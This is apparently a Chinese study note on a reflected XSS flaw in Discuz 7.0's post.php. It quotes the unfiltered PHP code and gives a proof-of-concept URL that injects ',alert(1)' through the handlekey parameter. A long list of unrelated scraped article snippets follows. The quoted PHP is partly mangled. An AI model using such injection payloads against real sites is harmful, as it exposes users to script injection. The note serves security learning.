小龙在山东
小龙在山东

discuz7.0 _post.php xss跨站漏洞-学习笔记

漏洞名称

discuz7.0 _post.php xss跨站漏洞

发布时间

2014-06-02

漏洞分类

反射型xss漏洞

缺陷代码

没有对所有参数进行过滤。

if($action == 'reply') {
    $addfeedcheck = $customaddfeed & 4 ? 'checked="checked"': '';
} elseif(!empty($special) && $action != 'reply') {
    $addfeedcheck = $customaddfeed & 2 ? 'checked="checked"': '';
} else {
    $addfeedcheck = $customaddfeed & 1 ? 'checked="checked"': '';
}


$navigation = $navtitle = $thread = '';
if(!empty($cedit)) {
    unset($inajax, $infloat, $ajaxtarget, $handlekey);
}

if($action == 'edit' || $action == 'reply') {

    if($thread = $db->fetch_first("SELECT * FROM {$tablepre}threads WHERE tid='$tid'".($auditstatuson ? '' : " AND displayorder>='0'"))) {

        $navigation = $tid\">$thread[subject]";
        $navtitle = $thread['subject'].' - ';
        if($thread['readperm'] && $thread['readperm'] > $readaccess && !$forum['ismoderator'] && $thread['authorid'] != $discuz_uid) {
            showmessage('thread_nopermission', NULL, 'NOPERM');
        }

        $fid = $thread['fid'];
        $special = $thread['special'];

    } else {
        showmessage('thread_nonexistence');
    }
    
    if($action == 'reply' && ($thread['closed'] == 1) && !$forum['ismoderator']) {
        showmessage('post_thread_closed');
    }

}
?>

实验步骤

打开目标站点,在url后加入如下poc:/post.php?action=reply&fid=17&tid=1591&extra=&replysubmit=yes&infloat=yes&handlekey=,alert(1)

discuz7.0 _post.php xss跨站漏洞-学习笔记_第1张图片

你可能感兴趣的:(安全实践)

  • DevOps安全性的重要性体现在哪? weixin_54503231 devops运维
    DevOps的安全性,也称为DevSecOps,是DevOps领域中的一个重要方面,它强调将安全实践集成到DevOps流程中,以提高代码发布的质量和速度,并降低安全漏洞的风险。DevOps安全性的重要性:提高代码质量和速度:通过将安全实践集成到开发和运营流程的各个方面,可以确保在快速迭代和发布的同时,保持代码的高质量。降低安全漏洞风险:通过持续的安全监测和评估,可以及时发现并修复潜在的安全漏洞,从
  • 中科大郑烇、杨坚《计算机网络》课程 第八章笔记 「已注销」 中科大郑烇杨坚《计算机网络》课程网络网络协议
    计算机网络第八章第8章网络安全本章目标:网络安全原理:加密,不仅仅用于机密性认证报文完整性密钥分发安全实践:防火墙各个层次的安全性:应用层,传输层,网络层和链路层8.1什么是网络安全?机密性:只有发送方和预订的接收方能否理解传输的报文内容发送方加密报文接收方解密报文认证:发送方和接收方需要确认对方的身份报文完整性:发送方、接受方需要确认报文在传输的过程中或者事后没有被改变访问控制和服务的可用性:服
  • 企业安全漏洞一览:七大隐患及其防范措施 知白守黑V 风险评估安全运营安全漏洞web安全网络安全风险评估安全运营安全态势漏洞预警安全意识
    网络安全是一场跌宕起伏,永无止境的拉锯战。攻击者的技术和手法不断花样翻新,主打一个“避实就虚”和“出奇制胜”;防御者的策略则强调“求之于势,不责于人”,依靠整体安全态势和风险策略的成熟度和韧性来化解风险。此外,经常被忽视的一点是,基础安全策略和实践同样重要。根据微软2023年数字防御风险报告,良好的基础安全实践可以防御99%的网络攻击。例如,漏洞管理、安全意识培训以及定期的安全评估工作。本文我们将
  • DevOps 团队应该了解的 5 个安全威胁 优维科技EasyOps 安全devops网络
    DevOps安全性,也称为DevSecOps,是一种将安全实践集成到DevOps流程中的理念。DevOps安全涉及通过发布工程师和安全团队之间持续、灵活的协作来创建“安全即代码”文化。DevSecOps运动与DevOps本身非常相似,专注于在敏捷框架内为复杂的软件开发流程创建新的解决方案。DevOps安全性在于打破孤岛并促进跨团队的开放式协作。它是为了让每个人都对安全负责,最终目标是提高代码发布的
  • Spring Boot项目Jar包加密:防止反编译的安全实践 IT·陈寒 SpringBoot框架学习微服务架构设计Java面试技巧springbootjar安全
    文章目录1.引言2.背景3.Jar包加密方案3.1使用Java混淆工具3.2使用Jar包加密工具3.2.1示例:使用JCryptor对Jar包进行加密4.加密后的Jar包的运行5.安全性与性能考虑5.1安全性考虑5.2性能考虑6.拓展功能与未来展望6.1数字签名与验签6.2使用加密算法库7.结语SpringBoot项目Jar包加密:防止反编译的安全实践☆*o(≧▽≦)o*☆嗨~我是IT·陈寒✨博客
  • 安全合规之漏洞扫描的重要意义 德迅云安全-小潘 安全网络web安全
    随着信息技术的飞速发展,企业在日常运营中越来越依赖于网络和数字化系统。然而,随之而来的是网络安全威胁的不断增加,给企业的数据和运营带来了巨大的风险。为了保护企业的资产和数据,企业需要积极采取措施来确保网络的安全性和合规性。其中,漏洞扫描是一项关键的安全实践,可以帮助企业发现和修复系统中的漏洞,满足安全合规要求。一、漏洞扫描的定义和作用漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计
  • 喜讯!美创和大数据局用户的数据安全实践被“北大”录取 数据库安全 大数据
    近日,宁波市镇海区大数据发展管理中心与美创科技联合申报的“数据安全运营中心建设项目”经过多轮专家评审,入选“北京大学数字政府与数字治理案例集”,并收录于《北大公共治理案例库》!“北京大学数字政府与数字治理案例征集活动”由北京大学政府管理学院和北京大学公共治理研究所共同发起,旨在促进数字政府领域的研究和实践,为学术研究、教学和政策分析提供集中的案例资源,支持领域专家、学者和实践者之间的交流与合作。此
  • CISSP-D7-运营安全 sinat_34066134 安全网络安全信息安全
    CISSP-D1-安全与风险管理CISSP-D2-资产安全CISSP-D3-安全架构与工程CISSP-D4-通讯与网络安全CISSP-D5-身份与访问控制CISSP-D6-安全评估和测试D7:运营安全一、运营安全概述:D7-1~3二、操作安全实践:D7-4~6三、灾难备份与恢复:D7-7~9D7-1-安全事件调查和取证1、计算机犯罪行为犯罪中的动机、机会和方式(motive、opportunity
  • 2023年国家基地“楚慧杯”网络空间安全实践能力竞赛 Wp 一点WP Fab1an CTF笔记安全
    MISC参考文章:天权信安“”2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUpez-zip使用脚本解套娃压缩包importioimportzipfilewithopen("4096.zip","rb")asf:data=f.read()info="666"whileTrue:withzipfile.ZipFile(io.BytesIO(data),"r")aszf:all_fil
  • 基线检查和基线含义 什么都好奇 网络tcp/ip服务器
    一、什么是基线基线指操作系统、数据库及中间件的安全实践及合规检查的配置红线,包括弱口令、账号权限、身份鉴别、密码策略、访问控制、安全审计和入侵防范等安全配置检查。二、安全基线与配置核查安全基线:是保持信息系统安全的机密性、完整性、可用性的最小安全控制,是系统的最小安全保证,最基本的安全要求。配置核查:是业务系统及所属设备在特定时期内,根据自身需求、部署环境和承载业务要求应满足的基本安全配置要求合集
  • DevSecOps 工具:初学者指南 网络研究院 网络研究院应用程序测试软件安全开发
    DevSecOps是开发、安全和运营的融合,标志着软件开发的范式转变,在整个软件开发生命周期(SDLC)中无缝集成安全性。这种方法标志着不再将安全视为开发过程中的一个阶段。除了DevSecOps的核心原则和最佳实践之外,特定工具也是实施和强化安全实践的关键推动者。随着组织采用DevSecOps策略,支持这些计划的工具的种类和数量自然也随之激增。这篇博文深入研究了DevSecOps工具的几个不同类别
  • JSON安全性 未来bbaa json
    确保JSON处理的安全性是现代Web开发中重要的一环。以下是一些关键的安全实践,用于防止JSON注入攻击以及确保数据在传输过程中的安全性:1.**验证和清洗输入:**-在将任何数据写入数据库之前,请确保验证用户输入。对于期望的JSON结构,验证字段类型和数据格式。-使用库函数对输入数据进行清洗,以避免跨站脚本攻击(XSS)和SQL注入等攻击。2.**使用安全的反序列化方法:**-避免使用不安全的编
  • SSL证书申请与部署指南 JoySSL230907 ssl网络协议网络httpshttp
    随着网络安全的日益重要,使用SSL证书来保护网站和用户数据已经成为一项基本的安全实践。本文将为您提供一份清晰的SSL证书申请与部署指南,确保您的网站在传输敏感信息时能够提供安全的加密保护。第一部分:SSL证书申请步骤一:选择SSL证书类型1.单域名证书:适用于单个域名。2.多域名证书:支持多个域名,常用于多个子域名或不同域名的保护。3.通配符证书:适用于主域名及其所有子域名。步骤二:选择SSL证书
  • 喜讯!云起无垠斩获“东升杯”国际创业大赛“优秀奖” 云起无垠 荣誉成就人工智能创业创新
    2023年第十一届“东升杯”国际创业大赛完美落下帷幕,本次大赛历经五个月的时间,在经历了50余场的激烈争夺后,最终在全球范围内评选出了Top60获奖项目。其中,新一代AI赋能软件供应链安全实践者——云起无垠凭借其优秀的科技创新实力和独特的业务理念,在众多参赛企业中脱颖而出,获得了本次大赛的优秀奖荣誉。“东升杯”国际创业大赛是由北京市人力资源和社会保障局、北京市科学技术委员会、中关村科技园区管理委员
  • JWT 单点登录探析:原理、用途与安全实践 沉梦听雨. 系统设计安全jwt
    JWT单点登录探析:原理、用途与安全实践什么是JWT?JWT(JSONWebToken)是目前最流行的跨域认证解决方案,是一种基于Token的认证授权机制。从JWT的全称可以看出,JWT本身也是Token,一种规范化之后的JSON结构的Token。通过数字签名的方式,以JSON对象为载体,在不同的服务终端之间安全的传输信息。JWT自身包含了身份验证所需要的所有信息,因此,我们的服务器不需要存储Se
  • 交通安全在整治 平安出行在贵州系列报道之六十五 不死冥王
    “交通助我前行安全护我成长”贵州省首个省级青少年交通安全实践基地正式启动开营为进一步推进全省交通安全文化阵地建设,努力营造安全、有序、畅通、和谐的道路交通环境,不断提升新时代青少年交通安全自我保护能力,2019年5月16日,由团省委、省公安厅交通管理局联合共建的贵州省青少年交通安全实践基地在贵阳市花溪区全国青少年贵州活动营地正式启动开营。这也是目前建成投入使用的贵州省首个中小学生道路交通安全实践基
  • 什么是Web 应用程序渗透测试? 蹦极的考拉 web安全安全网络安全web渗透测试渗透工程师
    Web应用程序渗透测试,也称为Web渗透测试或简称Web应用程序渗透测试,是一种涉及评估Web应用程序和网站安全性的网络安全实践。这是一种主动识别恶意攻击者可能利用的漏洞和弱点的方法。–Web应用程序安全评估Web渗透测试的目标是模拟对Web应用程序的真实攻击,以便在黑客利用安全漏洞之前发现它们。通过进行渗透测试,组织可以评估其安全措施的有效性,发现潜在的漏洞,并实施适当的安全措施来保护其Web应
  • 2023年国家基地“楚慧杯”网络空间安全实践能力竞赛 Web方向 题解wp Jay 17 CTF赛事PHPSQL注入反序列化Web安全CTF安全
    前言:三小时的比赛,和强网同时结束还要当场交wp,汗流浃背,烧起来了啊啊啊啊~eaaeval目录扫出备份文件源码如下a='admin';$this->b='admin';}publicfunction__destruct(){if(!preg_match("/flag|system|php|cat|tac|shell|sort/i",$this->a)&&!preg_match("/flag|sy
  • sql联合注入--Head传参 等黄昏等你来 网安网络安全sqlmysql
    未知攻,何知守。进行网络安全实践操作时,必须遵守网络安全法。网络安全法全文(必看)https://zhuanlan.zhihu.com/p/27336286为什么要学习网络安全:网络安全已经成为各国关注的焦点,不仅关系到机构和个人用户的信息资源和资产风险,也关系到国家安全和社会稳定。进入21世纪,随着信息化建设和IT技术的快速发展,各种网络技术的应用更加广泛深入,同时出现很多网络安全问题,致使网络
  • Gartner发布2024年及以后中国网络安全的七大主要趋势 galaxylove web安全安全
    网络安全实践方式、组织结构、技术本地化和法规是塑造和放大中国网络安全趋势的因素。我们重点介绍将影响中国首席信息官及其安全团队的战略和投资的七个关键趋势。以业务为中心的安全投资、暴露面管理、零信任、平台整合、身份优先、网络弹性、网络判断机会对改善网络安全流程、技能和技术的投资仍然是中国首席信息官和其他安全领导者的重点关注点。强调对这项投资的衡量,并将其价值融入为业务领导者设计的叙述中,可以显着提高这
  • 深入解析 JWT(JSON Web Tokens):原理、应用场景与安全实践 gulugulu1103 网络json前端安全
    什么是JWT?JWT(JSONWebTokens)是一种开放标准(RFC7519),用于在各方之间安全地传输信息作为JSON对象。由于其小巧和自包含的特性,它在Web应用程序和服务之间尤其流行用于身份验证和信息交换。JWT的主要优点和特性包括:自包含(Self-contained):JWT本身包含了所有必要的信息。一个JWT通常包含用户身份验证信息、token的发行者、过期时间等。紧凑(Compa
  • BSIMM学习 枕水眠山
    BSIMM全称是BuildingSecurityInMaturityModel,意即软件构建安全成熟度模型。这是一个开源模型,汇总提炼了业界众多公司开展的安全实践活动,取之于民用之于民,大家可免费使用这个模型。BSIMM包含四部分内容:治理、智能、SSDL触点、部署。各部分又分别包括三小项,每小项分为三个级别,每个级别有若干条活动要求。例如,部署包括渗透测试、安全环境、配置管理及漏洞管理。级别是这
  • 云匣子 FastJson反序列化RCE漏洞复现 OidBoy_G 漏洞复现安全web安全
    0x01产品简介云匣子是租户连接云资源的安全管理工具,帮助云租户更加安全、精细的管理云上的虚拟机、数据库等资源。云安宝结合多年的运维和安全实践,将云上的运维和安全有机结合,实现对运维过程的事前规划、事中控制和事后审计。在此之上,云匣子还完美集成了自动化运维、资产拓扑发现、账号安全等功能0x02漏洞概述云匣子authService接口处使用存在漏洞fastjson组件,未授权的攻击者可通过fastj
  • 实力认可 | 赛宁网安入选网络安全能力评价工作组成员单位 Cyberpeace 安全网络网络安全
    近日,南京赛宁信息技术有限公司(赛宁网安)凭借多年累积的网络安全实践经验、核心技术研发实力以及产品与解决方案能力,成功入选首批网络安全能力评价工作组成员单位!为了大力推动网络安全产业创新发展,强化网络安全产业供需对接,加强网络安全创新示范应用,繁荣网络安全产业生态,在工业和信息化部网络安全管理局的指导下,中国信息通信研究院牵头成立了网络安全能力评价工作组。因此,能够入选首批网络安全能力评价工作组成
  • IP-guard功能介绍 Chenchen_new 文档加密加密软件ipguardip-guard
    IP-guard基于系统管理思想和安全实践经验,全面考虑可能造成信息破坏及外泄的各个方面,保护企业信息不被人为外泄、非法盗取、恶意篡改,帮助企业对信息安全进行系统规划及管理。IP-guard通过灵活有力的管理,在保持企业活力的前提下规范终端行为,提升企业执行力;管理人员通过单一控制台随时了解各台计算机运行状态,并进行系统安全管理及资产管理。IP-guard的主要功能包括:应用程序管控记录应用程序使
  • Django 密码管理:安全实践与技术深入 K8sCat djangodjango安全
    在Web应用的开发中,密码管理是保障用户安全的关键环节。Django作为一个强大的PythonWeb框架,提供了一套全面的系统来处理密码的存储、验证和安全。本文将详细探讨Django中的密码管理机制,包括密码存储、密码验证、密码安全策略以及自定义密码验证规则。1.Django的密码存储机制Django使用了可扩展的密码存储系统,该系统可以支持多种密码哈希算法。默认情况下,Django使用PBKDF
  • 通付盾Web3专题 | SharkTeam:Web3安全实践与创新 数信云 DCloud web3安全智能合约网络安全
    在Web3领域,安全漏洞、黑客攻击已愈发成为用户和投资者重点关注的领域。如何保障加密资产的安全,Web3黑暗森林中又有哪些新的攻击模式产生,SharkTeam将从一线进行分享和讨论。我们先来看一下2023年1月到8月的安全事件数量和损失的数据统计。由于熊市影响,加密领域的资产总量降低,因安全问题产生的损失同比去年下降了59%。但这并不代表Web3领域的安全环境在变好,相反我们看到今年1月到8月,安
  • 安全至关重要 醍醐灌顶
    当您运行应用程序时,必须确保它是安全的。攻击者可以通过多种方式攻击您的应用程序,并有可能获取您的数据或使您的应用程序崩溃。如果您在Azure中运行应用程序,则可以获得许多现成的世界一流的保护。但您仍需遵循最佳安全实践,以确保Azure中的应用程序和基础结构尽可能安全。在本文中,我们将探讨Azure的一些安全方面的最佳做法,这些最佳做法可以帮助您提高应用程序的安全性。#1.对静态和移动数据进行加密数
  • 企业 SDLC 安全生命周期管理 god_Zeo 安全开发安全运维php
    最近看了很多SDLC的东西,把其中比较重要关键的记录一下,用简洁的语言说清楚0x01SDL介绍SDL是微软提出的一种软件开发安全生命周期管理的一种最佳安全实践,全称为SecurityDevelopmentLifecycle0x02为什么要SDL目的是为了从安全漏洞产生的根源上解决应用安全问题,通过对软件开发流程的控制,保证产品的安全性。SDL它主要侧重于软件开发的安全保证过程,所谓现在很多人说的安
  • 基于ISO 21434的汽车网络安全实践 Trinitytec 网络安全网络安全ISO21434
    “转载自维克多汽车技术(上海)有限公司,作者VectorChina”商业领域的IT系统和嵌入式产品的IT系统正在融合为一种多功能系统。相应地,关注汽车网络安全的ISO21434标准应运而生。该标准的意义在于提供了一个指南,可用于降低产品、项目和组织中存在的安全风险。为了有效实施ISO21434标准,本文介绍了遵循ISO21434的系统级安全工程实践方法,并通过实例进行分析。汽车网络安全风险汽车网络
  • 解线性方程组 qiuwanchi
    package gaodai.matrix; import java.util.ArrayList; import java.util.List; import java.util.Scanner; public class Test { public static void main(String[] args) { Scanner scanner = new Sc
  • 在mysql内部存储代码 annan211 性能mysql存储过程触发器
    在mysql内部存储代码 在mysql内部存储代码,既有优点也有缺点,而且有人倡导有人反对。 先看优点: 1 她在服务器内部执行,离数据最近,另外在服务器上执行还可以节省带宽和网络延迟。 2 这是一种代码重用。可以方便的统一业务规则,保证某些行为的一致性,所以也可以提供一定的安全性。 3 可以简化代码的维护和版本更新。 4 可以帮助提升安全,比如提供更细
  • Android使用Asynchronous Http Client完成登录保存cookie的问题 hotsunshine android
    Asynchronous Http Client是android中非常好的异步请求工具 除了异步之外还有很多封装比如json的处理,cookie的处理 引用 Persistent Cookie Storage with PersistentCookieStore This library also includes a PersistentCookieStore whi
  • java面试题 Array_06 java面试
    java面试题 第一,谈谈final, finally, finalize的区别。 final-修饰符(关键字)如果一个类被声明为final,意味着它不能再派生出新的子类,不能作为父类被继承。因此一个类不能既被声明为 abstract的,又被声明为final的。将变量或方法声明为final,可以保证它们在使用中不被改变。被声明为final的变量必须在声明时给定初值,而在以后的引用中只能
  • 网站加速 oloz 网站加速
    前序:本人菜鸟,此文研究总结来源于互联网上的资料,大牛请勿喷!本人虚心学习,多指教. 1、减小网页体积的大小,尽量采用div+css模式,尽量避免复杂的页面结构,能简约就简约。 2、采用Gzip对网页进行压缩;    GZIP最早由Jean-loup Gailly和Mark Adler创建,用于UNⅨ系统的文件压缩。我们在Linux中经常会用到后缀为.gz
  • 正确书写单例模式 随意而生 java 设计模式 单例
      单例模式算是设计模式中最容易理解,也是最容易手写代码的模式了吧。但是其中的坑却不少,所以也常作为面试题来考。本文主要对几种单例写法的整理,并分析其优缺点。很多都是一些老生常谈的问题,但如果你不知道如何创建一个线程安全的单例,不知道什么是双检锁,那这篇文章可能会帮助到你。   懒汉式,线程不安全   当被问到要实现一个单例模式时,很多人的第一反应是写出如下的代码,包括教科书上也是这样
  • 单例模式 香水浓 java
    懒汉  调用getInstance方法时实例化 public class Singleton { private static Singleton instance; private Singleton() {} public static synchronized Singleton getInstance() { if(null == ins
  • 安装Apache问题:系统找不到指定的文件 No installed service named "Apache2" AdyZhang apachehttp server
    安装Apache问题:系统找不到指定的文件 No installed service named "Apache2" 每次到这一步都很小心防它的端口冲突问题,结果,特意留出来的80端口就是不能用,烦。 解决方法确保几处: 1、停止IIS启动 2、把端口80改成其它 (譬如90,800,,,什么数字都好) 3、防火墙(关掉试试) 在运行处输入 cmd 回车,转到apa
  • 如何在android 文件选择器中选择多个图片或者视频? aijuans android
    我的android app有这样的需求,在进行照片和视频上传的时候,需要一次性的从照片/视频库选择多条进行上传 但是android原生态的sdk中,只能一个一个的进行选择和上传。 我想知道是否有其他的android上传库可以解决这个问题,提供一个多选的功能,可以使checkbox之类的,一次选择多个 处理方法 官方的图片选择器(但是不支持所有版本的androi,只支持API Level
  • mysql中查询生日提醒的日期相关的sql baalwolf mysql
    SELECT sysid,user_name,birthday,listid,userhead_50,CONCAT(YEAR(CURDATE()),DATE_FORMAT(birthday,'-%m-%d')),CURDATE(),  dayofyear( CONCAT(YEAR(CURDATE()),DATE_FORMAT(birthday,'-%m-%d')))-dayofyear(
  • MongoDB索引文件破坏后导致查询错误的问题 BigBird2012 mongodb
    问题描述: MongoDB在非正常情况下关闭时,可能会导致索引文件破坏,造成数据在更新时没有反映到索引上。 解决方案:   使用脚本,重建MongoDB所有表的索引。 var names = db.getCollectionNames(); for( var i in names ){ var name = names[i]; print(name);
  • Javascript Promise bijian1013 JavaScriptPromise
            Parse JavaScript SDK现在提供了支持大多数异步方法的兼容jquery的Promises模式,那么这意味着什么呢,读完下文你就了解了。 一.认识Promises         “Promises”代表着在javascript程序里下一个伟大的范式,但是理解他们为什么如此伟大不是件简
  • [Zookeeper学习笔记九]Zookeeper源代码分析之Zookeeper构造过程 bit1129 zookeeper
       Zookeeper重载了几个构造函数,其中构造者可以提供参数最多,可定制性最多的构造函数是     public ZooKeeper(String connectString, int sessionTimeout, Watcher watcher, long sessionId, byte[] sessionPasswd, boolea
  • 【Java命令三】jstack bit1129 jstack
    jstack是用于获得当前运行的Java程序所有的线程的运行情况(thread dump),不同于jmap用于获得memory dump   [hadoop@hadoop sbin]$ jstack Usage: jstack [-l] <pid> (to connect to running process) jstack -F
  • jboss 5.1启停脚本 动静分离部署 ronin47
    以前启动jboss,往各种xml配置文件,现只要运行一句脚本即可。start nohup sh /**/run.sh -c servicename  -b ip -g  clustername   -u broatcast jboss.messaging.ServerPeerID=int  -Djboss.service.binding.set=p
  • UI之如何打磨设计能力? brotherlamp UIui教程ui自学ui资料ui视频
      在越来越拥挤的初创企业世界里,视觉设计的重要性往往可以与杀手级用户体验比肩。在许多情况下,尤其对于 Web 初创企业而言,这两者都是不可或缺的。前不久我们在《右脑革命:别学编程了,学艺术吧》中也曾发出过重视设计的呼吁。如何才能提高初创企业的设计能力呢?以下是 9 位创始人的体会。 1.找到自己的方式 如果你是设计师,要想提高技能可以去设计博客和展示好设计的网站如D-lists或
  • 三色旗算法 bylijinnan java算法
    import java.util.Arrays; /** 问题: 假设有一条绳子,上面有红、白、蓝三种颜色的旗子,起初绳子上的旗子颜色并没有顺序, 您希望将之分类,并排列为蓝、白、红的顺序,要如何移动次数才会最少,注意您只能在绳 子上进行这个动作,而且一次只能调换两个旗子。 网上的解法大多类似: 在一条绳子上移动,在程式中也就意味只能使用一个阵列,而不使用其它的阵列来
  • 警告:No configuration found for the specified action: \'s chiangfai configuration
    1.index.jsp页面form标签未指定namespace属性。 <!--index.jsp代码--> <%@taglib prefix="s" uri="/struts-tags"%> ... <s:form action="submit" method="post"&g
  • redis -- hash_max_zipmap_entries设置过大有问题 chenchao051 redishash
    使用redis时为了使用hash追求更高的内存使用率,我们一般都用hash结构,并且有时候会把hash_max_zipmap_entries这个值设置的很大,很多资料也推荐设置到1000,默认设置为了512,但是这里有个坑   #define ZIPMAP_BIGLEN 254 #define ZIPMAP_END 255     /* Return th
  • select into outfile access deny问题 daizj mysqltxt导出数据到文件
    本文转自:http://hatemysql.com/2010/06/29/select-into-outfile-access-deny%E9%97%AE%E9%A2%98/ 为应用建立了rnd的帐号,专门为他们查询线上数据库用的,当然,只有他们上了生产网络以后才能连上数据库,安全方面我们还是很注意的,呵呵。 授权的语句如下: grant select on armory.* to rn
  • phpexcel导出excel表简单入门示例 dcj3sjt126com PHPExcelphpexcel
    <?php error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE);   if (PHP_SAPI == 'cli') die('This example should only be run from a Web Brows
  • 美国电影超短200句 dcj3sjt126com 电影
    1. I see. 我明白了。2. I quit! 我不干了!3. Let go! 放手!4. Me too. 我也是。5. My god! 天哪!6. No way! 不行!7. Come on. 来吧(赶快)8. Hold on. 等一等。9. I agree。 我同意。10. Not bad. 还不错。11. Not yet. 还没。12. See you. 再见。13. Shut up!
  • Java访问远程服务 dyy_gusi httpclientwebservicegetpost
        随着webService的崛起,我们开始中会越来越多的使用到访问远程webService服务。当然对于不同的webService框架一般都有自己的client包供使用,但是如果使用webService框架自己的client包,那么必然需要在自己的代码中引入它的包,如果同时调运了多个不同框架的webService,那么就需要同时引入多个不同的clien
  • Maven的settings.xml配置 geeksun settings.xml
    settings.xml是Maven的配置文件,下面解释一下其中的配置含义: settings.xml存在于两个地方: 1.安装的地方:$M2_HOME/conf/settings.xml 2.用户的目录:${user.home}/.m2/settings.xml 前者又被叫做全局配置,后者被称为用户配置。如果两者都存在,它们的内容将被合并,并且用户范围的settings.xml优先。
  • ubuntu的init与系统服务设置 hongtoushizi ubuntu
    转载自:  http://iysm.net/?p=178 init Init是位于/sbin/init的一个程序,它是在linux下,在系统启动过程中,初始化所有的设备驱动程序和数据结构等之后,由内核启动的一个用户级程序,并由此init程序进而完成系统的启动过程。 ubuntu与传统的linux略有不同,使用upstart完成系统的启动,但表面上仍维持init程序的形式。 运行
  • 跟我学Nginx+Lua开发目录贴 jinnianshilongnian nginxlua
    使用Nginx+Lua开发近一年的时间,学习和实践了一些Nginx+Lua开发的架构,为了让更多人使用Nginx+Lua架构开发,利用春节期间总结了一份基本的学习教程,希望对大家有用。也欢迎谈探讨学习一些经验。    目录 第一章 安装Nginx+Lua开发环境 第二章 Nginx+Lua开发入门 第三章 Redis/SSDB+Twemproxy安装与使用 第四章 L
  • php位运算符注意事项 home198979 位运算PHP&
    $a = $b = $c = 0; $a & $b = 1; $b | $c = 1  问a,b,c最终为多少?   当看到这题时,我犯了一个低级错误,误 以为位运算符会改变变量的值。所以得出结果是1 1 0 但是位运算符是不会改变变量的值的,例如: $a=1;$b=2; $a&$b;  这样a,b的值不会有任何改变
  • Linux shell数组建立和使用技巧 pda158 linux
    1.数组定义   [chengmo@centos5 ~]$ a=(1 2 3 4 5)   [chengmo@centos5 ~]$ echo $a   1   一对括号表示是数组,数组元素用“空格”符号分割开。    2.数组读取与赋值   得到长度:   [chengmo@centos5 ~]$ echo ${#a[@]}   5   用${#数组名[@或
  • hotspot源码(JDK7) ol_beta javaHotSpotjvm
    源码结构图,方便理解:   ├─agent                            Serviceab
  • Oracle基本事务和ForAll执行批量DML练习 vipbooks oraclesql
    基本事务的使用: 从账户一的余额中转100到账户二的余额中去,如果账户二不存在或账户一中的余额不足100则整笔交易回滚 select * from account; -- 创建一张账户表 create table account( -- 账户ID id number(3) not null, -- 账户名称 nam
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他